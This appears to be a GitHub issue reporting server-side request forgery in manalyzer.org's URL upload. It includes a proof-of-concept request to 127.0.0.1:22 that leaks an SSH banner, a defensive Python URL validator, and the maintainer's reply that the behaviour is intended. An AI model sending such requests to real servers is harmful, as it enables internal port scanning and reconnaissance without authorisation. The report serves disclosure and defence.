JusticeRage / Manalyze

A static analyzer for PE executables.


Server-side request forgery on manalyzer.org via url upload


Hi manalyzer team

There is an SSRF on the request via URL upload; as you can see here, the SSH version you use is leaked in the response:

Request:

```http
POST /upload HTTP/1.1
Host: manalyzer.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210165242507531672849060397
Content-Length: 186
Origin: https://manalyzer.org
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210165242507531672849060397
Content-Disposition: form-data; name="url"

http://127.0.0.1:22/
-----------------------------210165242507531672849060397--
```
Response:

```http
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Sun, 03 Oct 2021 14:26:10 GMT
Content-Type: application/json
Content-Length: 192
Connection: close
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff

{"data":{"error_message":"An error occurred while retrieving the requested file (('Connection aborted.', BadStatusLine('SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\\r\\n')))."},"status":"failed"}
```


An attacker is able to scan internal ports and can also perform directory enumeration on http://127.0.0.1/$FUZZ$ ... To fix this, block access to internal hosts.
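A server-side check of the kind the report asks for ("block access to internal hosts"), written here as an added example; it is not code from Manalyze or from the manalyzer.org backend, which is only assumed to be a Python service because the error text in the response is a Python `requests` exception. The function names, the scheme and port allow-lists and the offline hostname table are all assumptions: the user-supplied URL is resolved before any fetch and rejected when any resulting address is loopback, private, link-local or otherwise non-public.

```python
import ipaddress
import socket
from urllib.parse import urlparse
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}  # None: the scheme's default port

def is_public_address(addr: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast

def check_download_url(url: str, resolve=socket.getaddrinfo):
    """Return (ok, reason); `resolve` mimics getaddrinfo so tests run offline."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL not allowed"
    try:
        port = parsed.port  # raises ValueError on a non-numeric port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    try:
        infos = resolve(host, port or 80, proto=socket.IPPROTO_TCP)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False, f"cannot resolve {host!r}"
    # Every address the name maps to must be public, not only the first one.
    for info in infos:
        addr = info[4][0]
        if not is_public_address(addr):
            return False, f"{host!r} resolves to non-public address {addr}"
    return True, "ok"

# Constructed hostname table for offline demonstration; not real DNS data.
SAMPLE_HOSTS = {"127.0.0.1": "127.0.0.1", "localhost": "127.0.0.1", "::1": "::1",
                "metadata.internal": "169.254.169.254", "files.corp": "10.0.0.5",
                "public.example": "93.184.216.34"}

def offline_resolver(table):
    # getaddrinfo-like stand-in that answers from `table` instead of DNS
    def resolve(host, port, proto=None):
        if host not in table:
            raise socket.gaierror(f"unknown host {host!r}")
        return [(socket.AF_INET, socket.SOCK_STREAM, proto, "", (table[host], port))]
    return resolve
```

The fetch that follows must connect to the address this check validated rather than re-resolving the hostname, otherwise a name whose answer changes between check and fetch (DNS rebinding) still reaches an internal host. Each HTTP redirect the fetched server returns needs the same check on its target.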

Hello! This was reported several times already. This feature is part of the normal features of the website (it is supposed to connect to other resources to download samples).
Quoting from the bug bounty page:

Security issues in the manalyzer.org machine are eligible as well. However, only bugs which have an actual security impact will be rewarded with money (i.e. exploitability needs to be demonstrated). In particular, vulnerabilities commonly used to extort money from gullible clients or otherwise fill empty pentest reports (missing clickjacking headers, XSS on logout forms, etc.) will be ignored. You know what these are.

It doesn't feel like reading an SSH banner will lead to any security issue.